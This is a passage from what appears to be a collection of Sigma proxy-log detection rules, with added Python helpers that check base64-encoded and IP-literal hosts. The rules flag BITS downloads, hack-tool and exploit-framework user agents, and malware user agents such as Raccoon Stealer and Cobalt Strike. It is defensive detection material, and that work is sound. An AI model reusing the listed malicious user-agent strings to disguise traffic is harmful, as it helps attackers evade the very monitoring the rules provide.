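    return base64.b64encode(prefix).decode("ascii")[:stable_len]


# The rule's four prefixes, keyed by the plaintext they were derived from.
RULE_PREFIXES = {
    b"Chrome": "Q2hyb21l",
    b"AppleWebKit": "QXBwbGVXZWJLaX",
    b"Dalvik": "RGFsdmlr",
    b"Mozilla": "TW96aWxsY",
}


def rule_prefixes_are_stable() -> bool:
    """True if every literal in the rule equals the stable prefix of its word."""
    return all(stable_b64_prefix(w) == enc for w, enc in RULE_PREFIXES.items())


def encode_ua(user_agent: str) -> str:
    """Base64 without padding, the form a sample would put on the wire."""
    return base64.b64encode(user_agent.encode()).decode("ascii").rstrip("=")


def decode_suspicious_ua(user_agent: str):
    """None if the rule would not fire; otherwise the decoded text for the
    analyst (padding restored), or a marker when the rest is not base64."""
    if not user_agent.startswith(tuple(RULE_PREFIXES.values())):
        return None
    padded = user_agent + "=" * (-len(user_agent) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return "<prefix matched but remainder is not valid base64>"
```

`stable_b64_prefix(b"Mozilla")` gives `TW96aWxsY`, nine characters for seven bytes, and `rule_prefixes_are_stable()` is true for all four entries. The same function produces the right literal for any other word one wants to add to the list, which avoids the common mistake of pasting a full base64 string whose last characters change with the text that follows.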
  {
    "path": "rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml",
    "content": "title: Bitsadmin to Uncommon IP Server Address\nid: 8ccd35a2-1c7c-468b-b568-ac6cdf80eec3\nstatus: test\ndescription: Detects Bitsadmin connections to IP addresses instead of FQDN names\nreferences:\n    - https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-10\nmodified: 2022-08-24\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|startswith: 'Microsoft BITS/'\n        cs-host|endswith: # host ends in a decimal digit; '0' is needed for addresses such as 10.0.0.10\n            - '0'\n            - '1'\n            - '2'\n            - '3'\n            - '4'\n            - '5'\n            - '6'\n            - '7'\n            - '8'\n            - '9'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
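The rule above recognises an IP literal by the last character of `cs-host`, which is cheap to express in Sigma but is only an approximation. The Python below is an added example, not code from the Sigma project: it compares a digit-suffix check of the kind the rule uses with a real address parse (`ipaddress.ip_address`) over constructed BITS requests (the `Microsoft BITS/7.8` version string and the hosts are made up; only the `Microsoft BITS/` prefix matters to the rule). Two gaps become visible: an IPv6 literal ending in a hex letter is missed by the suffix check if the proxy logs IPv6 literals, and a bare hostname such as `fileserver01` trips it.

```python
import ipaddress

# Added example, not the Sigma project's code: compares the rule's
# "cs-host ends in a digit" heuristic with a real IP-literal parse over
# constructed BITS requests (not log data).

BITS_UA_PREFIX = "Microsoft BITS/"  # the rule's c-useragent|startswith value


def host_is_ip_literal(host: str) -> bool:
    """True when cs-host is an IPv4/IPv6 literal, with or without a port."""
    h = host.strip()
    if h.startswith("["):          # [2001:db8::1]:8080
        h = h[1:].split("]", 1)[0]
    elif h.count(":") == 1:        # 203.0.113.10:8080
        h = h.split(":", 1)[0]
    try:
        ipaddress.ip_address(h)
        return True
    except ValueError:
        return False


def host_ends_in_digit(host: str) -> bool:
    """The digit-suffix heuristic, i.e. cs-host|endswith over '0'..'9'."""
    return host.endswith(tuple("0123456789"))


# Constructed BITS requests; the version in the User-Agent is made up.
SAMPLE_REQUESTS = [
    {"c-useragent": "Microsoft BITS/7.8", "cs-host": "203.0.113.10"},
    {"c-useragent": "Microsoft BITS/7.8", "cs-host": "198.51.100.7:8080"},
    {"c-useragent": "Microsoft BITS/7.8", "cs-host": "[2001:db8::1]:443"},
    {"c-useragent": "Microsoft BITS/7.8", "cs-host": "2001:db8::cafe"},
    {"c-useragent": "Microsoft BITS/7.8", "cs-host": "download.windowsupdate.com"},
    {"c-useragent": "Microsoft BITS/7.8", "cs-host": "fileserver01"},
    {"c-useragent": "curl/8.4.0", "cs-host": "203.0.113.99"},  # not BITS: ignored
]


def flagged_hosts(requests=SAMPLE_REQUESTS, check=host_is_ip_literal):
    """cs-host values of BITS requests that `check` flags."""
    return [r["cs-host"] for r in requests
            if r["c-useragent"].startswith(BITS_UA_PREFIX) and check(r["cs-host"])]
```

`flagged_hosts()` returns the four literals; `flagged_hosts(check=host_ends_in_digit)` drops `2001:db8::cafe` and adds `fileserver01`. In a backend that supports it, `cs-host|re` with an IPv4 pattern such as `^\d{1,3}(\.\d{1,3}){3}(:\d+)?$` is the closest Sigma equivalent of the precise check.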
  {
    "path": "rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml",
    "content": "title: Bitsadmin to Uncommon TLD\nid: 9eb68894-7476-4cd6-8752-23b51f5883a7\nstatus: test\ndescription: Detects Bitsadmin connections to domains with uncommon TLDs\nreferences:\n    - https://twitter.com/jhencinski/status/1102695118455349248\n    - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/\nauthor: Florian Roth (Nextron Systems), Tim Shelton\ndate: 2019-03-07\nmodified: 2023-05-17\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|startswith: 'Microsoft BITS/'\n    falsepositives:\n        cs-host|endswith:\n            - '.com'\n            - '.net'\n            - '.org'\n            - '.scdn.co' # spotify streaming\n            - '.sfx.ms' # Microsoft domain, example request: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-08-15-21-xx-xx/PreSignInSettingsConfig.json\n    condition: selection and not falsepositives\nfalsepositives:\n    - Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_cryptominer.yml",
    "content": "title: Crypto Miner User Agent\nid: fa935401-513b-467b-81f4-f9e77aa0dd78\nstatus: test\ndescription: Detects suspicious user agent strings used by crypto miners in proxy logs\nreferences:\n    - https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65\n    - https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-21\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|startswith:\n        # XMRig\n            - 'XMRig '\n        # CCMiner\n            - 'ccminer'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_empty.yml",
    "content": "title: HTTP Request With Empty User Agent\nid: 21e44d78-95e7-421b-a464-ffd8395659c4\nstatus: test\ndescription: |\n    Detects a potentially suspicious empty user agent string in proxy logs.\n    Could indicate an uncommon request method.\nreferences:\n    - https://twitter.com/Carlos_Perez/status/883455096645931008\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-07-08\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n      # Empty string - as used by Powershell's (New-Object Net.WebClient).DownloadString\n        c-useragent: ''\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_frameworks.yml",
    "content": "title: Exploit Framework User Agent\nid: fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f\nstatus: test\ndescription: Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs\nreferences:\n    - https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-07-08\nmodified: 2025-01-18\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent:\n        # Cobalt Strike https://www.cobaltstrike.com/help-malleable-c2\n            - 'Internet Explorer *'\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)' # https://bluescreenofjeff.com/2016-06-28-cobalt-strike-http-c2-redirectors-with-apache-mod_rewrite/\n\n        # Metasploit Framework - Analysis by Didier Stevens https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/\n            - 'Mozilla/4.0 (compatible; Metasploit RSPEC)'\n            - 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' # old browser, rare, base-lining needed\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' # old browser, rare, base-lining needed\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)' # old browser, rare, base-lining needed\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N'\n            - 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' # only use in proxy logs - not for detection in web server logs\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13'\n            - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)' # Payloads\n\n     
   # Metasploit Update by Florian Roth 08.07.2017\n            - 'Mozilla/5.0'\n            - 'Mozilla/4.0 (compatible; SPIPE/1.0'\n        # - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'  # too many false positives expected\n        # - 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'  # too many false positives expected\n            - 'Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0'\n            - 'Sametime Community Agent' # Unknown if prone to false positives - https://github.com/rapid7/metasploit-framework/blob/97095ab3113de2f046e64a64c461a1f888554401/modules/exploits/windows/http/steamcast_useragent.rb\n            - 'X-FORWARDED-FOR'\n            - 'DotDotPwn v2.1'\n            - 'SIPDROID'\n            - 'Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)' # CobaltStrike https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/\n\n        # Empire\n            - 'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) Gecko/20140205     Firefox/27.0 Iceweasel/25.3.0'\n\n        # Exploits\n            - '*wordpress hash grabber*'\n            - '*exploit*'\n\n        # Havoc\n            - 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36'  # https://github.com/HavocFramework/Havoc/issues/519\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_hacktool.yml",
    "content": "title: Hack Tool User Agent\nid: c42a3073-30fb-48ae-8c99-c23ada84b103\nstatus: test\ndescription: Detects suspicious user agent strings used by hack tools in proxy logs\nreferences:\n    - https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb\n    - http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-07-08\nmodified: 2022-07-07\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.credential-access\n    - attack.t1110\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|contains:\n            # Vulnerability scanner and brute force tools\n            - '(hydra)'\n            - ' arachni/'\n            - ' BFAC '\n            - ' brutus '\n            - ' cgichk '\n            - 'core-project/1.0'\n            - ' crimscanner/'\n            - 'datacha0s'\n            - 'dirbuster'\n            - 'domino hunter'\n            - 'dotdotpwn'\n            - 'FHScan Core'\n            - 'floodgate'\n            - 'get-minimal'\n            - 'gootkit auto-rooter scanner'\n            - 'grendel-scan'\n            - ' inspath '\n            - 'internet ninja'\n            - 'jaascois'\n            - ' zmeu '\n            - 'masscan'\n            - ' metis '\n            - 'morfeus fucking scanner'\n            - 'n-stealth'\n            - 'nsauditor'\n            - 'pmafind'\n            - 'security scan'\n            - 'springenwerk'\n            - 'teh forest lobster'\n            - 'toata dragostea'\n            - ' vega/'\n            - 'voideye'\n            - 'webshag'\n            - 'webvulnscan'\n            - ' whcc/'\n            # SQL Injection\n            - ' Havij'\n            - 'absinthe'\n            - 'bsqlbf'\n            - 'mysqloit'\n            - 'pangolin'\n            - 'sql power injector'\n            - 'sqlmap'\n            - 
'sqlninja'\n            - 'uil2pn'\n            # Hack tool\n            - 'ruler'  # https://www.crowdstrike.com/blog/using-outlook-forms-lateral-movement-persistence/\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)'  # SQLi Dumper\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_malware.yml",
    "content": "title: Malware User Agent\nid: 5c84856b-55a5-45f1-826f-13f37250cf4e\nstatus: test\ndescription: Detects suspicious user agent strings used by malware in proxy logs\nreferences:\n    - http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules\n    - http://www.botopedia.org/search?searchword=scan&searchphrase=all\n    - https://networkraptor.blogspot.com/2015/01/user-agent-strings.html\n    - https://perishablepress.com/blacklist/ua-2013.txt\n    - https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents\n    - https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q\n    - https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large\n    - https://twitter.com/crep1x/status/1635034100213112833\nauthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2017-07-08\nmodified: 2024-04-14\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent:\n            # RATs\n            - 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0' # DragonOK\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  1.1.4322)' # Used by PlugX - old - https://unit42.paloaltonetworks.com/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\n            - 'HttpBrowser/1.0' # HTTPBrowser RAT\n            - '*<|>*' # Houdini / Iniduoh / njRAT\n            - 'nsis_inetc (mozilla)' # ZeroAccess\n            - 'Wget/1.9+cvs-stable (Red Hat modified)' # Dyre / Upatre\n      
      # Ghost419 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)'\n            # Malware\n            - '*zeroup*' # W32/Renos.Downloader\n            - 'Mozilla/5.0 (Windows NT 5.1 ; v.*' # Kazy\n            - '* adlib/*'\n            - '* tiny' # Trojan Downloader\n            - '* BGroom *' # Trojan Downloader\n            - '* changhuatong'\n            - '* CholTBAgent'\n            - 'Mozilla/5.0 WinInet'\n            - 'RookIE/1.0'\n            - 'M' # HkMain\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' # Egamipload - old UA - probably prone to false positives\n            - 'Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)' # Yakes\n            - 'backdoorbot'\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)' # Sality\n            - 'Opera/8.81 (Windows NT 6.0; U; en)' # Sality\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)' # Sality\n            - 'Opera' # Trojan Keragany\n            - 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)' # Fareit\n            - 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)' # Webshell's back connect\n            - 'MSIE' # Toby web shell\n            - '*(Charon; Inferno)' # Loki Bot\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)' # Fareit / Pony\n            - 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' # https://www.virustotal.com/gui/file/8abbef8e58f012d45a7cb46c3c2729dcd33cf53e721ff8c59e238862aa0a9e0e/detection\n            - 'Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)' # MacControl malware 
https://www.virustotal.com/gui/file/d60f61f1f03a5011a0240694e110c6d370bf68a92753093186c6d14e26a15428/detection https://www.symantec.com/connect/blogs/osxmacontrol-back-it-again\n            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' # used by Zebrocy malware https://app.any.run/tasks/7d7fa4a0-6970-4428-828b-29572abf9ceb/\n            # Ursnif\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)'\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)'\n            # Emotet\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3)' # https://twitter.com/webbthewombat/status/1225827092132179968\n            # Lockbit (https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q)\n            - 'Mozilla/5.0 (Windows NT 6.1)'\n            - 'AppleWebkit/587.38 (KHTML, like Gecko)'\n            - 'Chrome/91.0.4472.77'\n            - 'Safari/537.36'\n            - 'Edge/91.0.864.37'\n            - 'Firefox/89.0'\n            - 'Gecko/20100101'\n            # Others\n            - '* pxyscand*'\n            - '* asd'\n            - '* mdms'\n            - 'sample'\n            - 'nocase'\n            - 'Moxilla'\n            - 'Win32 *'\n            - '*Microsoft Internet Explorer*'\n            - 'agent *'\n            - 'AutoIt' # Suspicious - base-lining recommended\n            - 'IczelionDownLoad'\n            - 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # https://unit42.paloaltonetworks.com/thor-plugx-variant/\n            - 'record' # https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/\n            - 'mozzzzzzzzzzz' # https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/\n            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0' # Quasar RAT UA 
https://twitter.com/malmoeb/status/1559994820692672519?s=20&t=g3tkNL09dZZWbFN10qDVjg\n            - 'Havana/0.1' # https://www.cybereason.com/blog/threat-alert-havanacrypt-ransomware-masquerading-as-google-update\n            - 'antSword/v2.1' # AntSword Webshell UA\n            - 'rqwrwqrqwrqw'  # Racoon Stealer\n            - 'qwrqrwrqwrqwr'  # Racoon Stealer\n            - 'rc2.0/client'  # Racoon Stealer\n            - 'TakeMyPainBack'  # Racoon Stealer\n            - 'xxx' # Racoon Stealer\n            - '20112211' # Racoon Stealer\n            - '23591' # Racoon Stealer\n            - '901785252112' # Racoon Stealer\n            - '1235125521512' # Racoon Stealer\n            - '125122112551' # Racoon Stealer\n            - 'B1D3N_RIM_MY_ASS' # Racoon Stealer\n            - 'AYAYAYAY1337' # Racoon Stealer\n            - 'iMightJustPayMySelfForAFeature' # Racoon Stealer\n            - 'ForAFeature' # Racoon Stealer\n            - 'Ares_ldr_v_*' # AresLoader\n            # - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106' # seen used by AresLoader\n            - 'Microsoft Internet Explorer' # https://github.com/silence-is-best/c2db\n            - 'CLCTR' # https://github.com/silence-is-best/c2db\n            - 'uploader' # https://github.com/silence-is-best/c2db\n            - 'agent' # https://github.com/silence-is-best/c2db\n            - 'License' # https://github.com/silence-is-best/c2db\n            - 'vb wininet' # https://github.com/silence-is-best/c2db\n            - 'Client' # https://github.com/silence-is-best/c2db\n            - 'Lilith-Bot/3.0' # Lilith Stealer - https://twitter.com/suyog41/status/1558051450797690880\n            - 'svc/1.0' # SVC Loader - https://twitter.com/suyog41/status/1558051450797690880\n            - 'WSHRAT' # WSHRAT - https://twitter.com/suyog41/status/1558051450797690880\n            - 'ZeroStresser Botnet/1.5' # Zerobot - https://twitter.com/suyog41/status/1558051450797690880\n           
 - 'OK' # Nymaim - https://twitter.com/suyog41/status/1558051450797690880\n            - 'Project1sqlite' # DarkCloud - https://twitter.com/suyog41/status/1558051450797690880\n            - 'Project1' # DarkCloud - https://twitter.com/suyog41/status/1558051450797690880\n            - 'DuckTales' # Racoon Stealer\n            - 'Zadanie' # Racoon Stealer\n            - 'GunnaWunnaBlueTips' # Racoon Stealer\n            - 'Xlmst' # Racoon Stealer\n            - 'GeekingToTheMoon' # Racoon Stealer\n            - 'SunShineMoonLight' # Racoon Stealer\n            - 'BunnyRequester' # BunnyStealer\n            - 'BunnyTasks' # BunnyStealer\n            - 'BunnyStealer' # BunnyStealer\n            - 'BunnyLoader_Dropper' # BunnyStealer\n            - 'BunnyLoader' # BunnyStealer\n            - 'BunnyShell' # BunnyStealer\n            - 'SPARK-COMMIT' # SparkRAT - https://arcticwolf.com/resources/blog/tellmethetruth-exploitation-of-cve-2023-46604-leading-to-ransomware/\n            - '4B4DB4B3' # B4B3RAT - https://twitter.com/naumovax/status/1718956514491130301\n            - 'SouthSide' # Racoon Stealer\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)' # Latrodectus loader\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_powershell.yml",
    "content": "title: Windows PowerShell User Agent\nid: c8557060-9221-4448-8794-96320e6f3e74\nstatus: test\ndescription: Detects Windows PowerShell Web Access\nreferences:\n    - https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-13\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|contains: ' WindowsPowerShell/'\n    condition: selection\nfalsepositives:\n    - Administrative scripts that download files from the Internet\n    - Administrative scripts that retrieve certain website contents\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_rclone.yml",
    "content": "title: Rclone Activity via Proxy\nid: 2c03648b-e081-41a5-b9fb-7d854a915091\nstatus: test\ndescription: Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string\nreferences:\n    - https://rclone.org/\n    - https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone\nauthor: Janantha Marasinghe\ndate: 2022-10-18\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|startswith: 'rclone/v'\n    condition: selection\nfalsepositives:\n    - Valid requests with this exact user agent that are made by legitimate scripts or sysadmin operations\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_susp.yml",
    "content": "title: Suspicious User Agent\nid: 7195a772-4b3f-43a4-a210-6a003d65caa1\nstatus: test\ndescription: Detects suspicious malformed user agent strings in proxy logs\nreferences:\n    - https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-07-08\nmodified: 2022-10-31\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection1:\n        c-useragent|startswith:\n            - 'user-agent'  # User-Agent: User-Agent:\n            - 'Mozilla/3.0 '\n            - 'Mozilla/2.0 '\n            - 'Mozilla/1.0 '\n            - 'Mozilla '  # missing slash\n            - ' Mozilla/'  # leading space\n            - 'Mozila/'  # single 'l'\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol'  # https://twitter.com/NtSetDefault/status/1303643299509567488\n    selection2:\n        c-useragent|contains:\n            - ' (compatible;MSIE '  # typical typo - missing space\n            - '.0;Windows NT '  # typical typo - missing space\n            - 'loader'  # https://twitter.com/securityonion/status/1522614635152744453?s=20&t=gHyPTSq5A27EqKwrCd9ohg\n    selection3:\n        c-useragent:\n            - '_'\n            - 'CertUtil URL Agent'  # https://twitter.com/stvemillertime/status/985150675527974912\n            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)'  # CobaltStrike Beacon https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/\n            - 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0'  # used by APT28 malware https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html\n            - 'HTTPS'  # https://twitter.com/stvemillertime/status/1204437531632250880\n            - 'Erbium-UA-4ce7c27cb4be9d32e333bf032c88235a'  # https://www.cyfirma.com/outofband/erbium-stealer-malware-report\n            - 'x'  # Used by Racoon Stealer but could be something else\n            - 'xxx'  # Used by Racoon Stealer but could be something else\n    falsepositives:\n        - c-useragent: 'Mozilla/3.0 * Acrobat *'  # Acrobat with linked content\n        - cs-host|endswith: # Adobe product traffic, example: Mozilla/3.0 (compatible; Adobe Synchronizer 10.12.20000)\n              - '.acrobat.com'\n              - '.adobe.com'\n              - '.adobe.io'\n    condition: 1 of selection* and not falsepositives\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_susp_base64.yml",
    "content": "title: Potential Base64 Encoded User-Agent\nid: 894a8613-cf12-48b3-8e57-9085f54aa0c3\nrelated:\n    - id: d443095b-a221-4957-a2c4-cd1756c9b747\n      type: derived\nstatus: test\ndescription: Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.\nreferences:\n    - https://blogs.jpcert.or.jp/en/2022/07/yamabot.html\n    - https://deviceatlas.com/blog/list-of-user-agent-strings#desktop\nauthor: Florian Roth (Nextron Systems), Brian Ingram (update)\ndate: 2022-07-08\nmodified: 2023-05-04\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|endswith: '='\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_webdav_external_execution.yml",
    "content": "title: Suspicious External WebDAV Execution\nid: 1ae64f96-72b6-48b3-ad3d-e71dff6c6398\nrelated:\n    - id: 4c55738d-72d8-490e-a2db-7969654e375f\n      type: similar\nstatus: test\ndescription: |\n    Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.\nreferences:\n    - https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4\n    - https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462\n    - https://www.trendmicro.com/en_no/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\n    - https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html\nauthor: Ahmed Farouk\ndate: 2024-05-10\ntags:\n    - attack.initial-access\n    - attack.resource-development\n    - attack.t1584\n    - attack.t1566\nlogsource:\n    category: proxy\ndetection:\n    selection_webdav:\n        c-useragent|startswith: 'Microsoft-WebDAV-MiniRedir/'\n        cs-method: 'GET'\n    selection_execution:\n        c-uri|endswith:\n            - '.7z'\n            - '.bat'\n            - '.dat'\n            - '.cmd'\n            - '.exe'\n            - '.js'\n            - '.lnk'\n            - '.ps1'\n            - '.rar'\n            - '.url'\n            - '.vbe'\n            - '.vbs'\n            - '.zip'\n    filter_main_local_ips:\n        dst_ip|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_f5_tm_utility_bash_api_request.yml",
